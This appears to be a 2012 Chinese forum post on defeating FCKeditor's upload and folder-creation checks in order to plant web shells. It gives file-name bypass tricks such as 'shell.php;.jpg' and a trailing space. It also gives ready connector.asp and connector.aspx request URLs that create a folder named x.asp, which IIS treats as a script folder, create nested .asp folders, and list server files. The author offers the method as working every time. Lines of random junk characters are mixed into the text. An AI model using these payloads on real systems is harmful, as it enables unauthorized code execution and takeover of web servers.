很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
% O8 F, q! B" @2 g* E7 c; y. ^$ K; \1 }
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。3 ^2 K% s' E) d' l3 q
8 m% F5 L# O; \, m, G8 L继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
% z! b4 @: |! S" C; {: Y. F' K- T5 P! }% H5 p6 ~# @3 n |
突破建立文件夹:
+ W7 h) f7 J# u# C) Y8 v) a/ \
; ?' @# P, y$ |' zeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp- [2 x& b6 ]3 [% @
3 J" S. r. M& b参数:& d ]$ N, W7 G" K5 T- Z/ Z# N4 v2 O q
" q8 N, o6 `, Z2 j当前目录名:CurrentFolder=/qing.asp* |; z! l7 j" b! }
/ {* d/ I1 M5 |# q$ E新的目录名:NewFolderName=x.asp' w% ?' J" _8 d( N* o3 k2 q+ |
* a- F F* o, @其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
/ I N" y" L9 x1 H& p. C5 h2 J; a G& I+ X8 V% n2 W$ V8 O5 `* P9 q
那么 x.asp 就已经建立生成了,此方法百试百灵!
1 R7 M2 a# F# l. v& T `9 i0 M
\" [% Y& t, ^新建文件夹参数 x.asp,基本都能搞定。& a& n' y! D+ }$ U
/ R U t% H; a2 Z! y下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建1 v- k+ }! s1 ]1 D2 _8 v8 q( \
) @5 ^4 s2 K6 x% @" l( W
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp0 ~% r1 S8 C# q4 `+ L& {
, ^) B! s# j4 V* ]3 \( v* G+ u获取文件列表3 G" u8 [ y( W5 v
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
" ~' R+ A0 l* ~( `/ n
1 z4 w! B+ {* T% p |
发表于 2012-12-31 09:27:09
收藏
支持
反对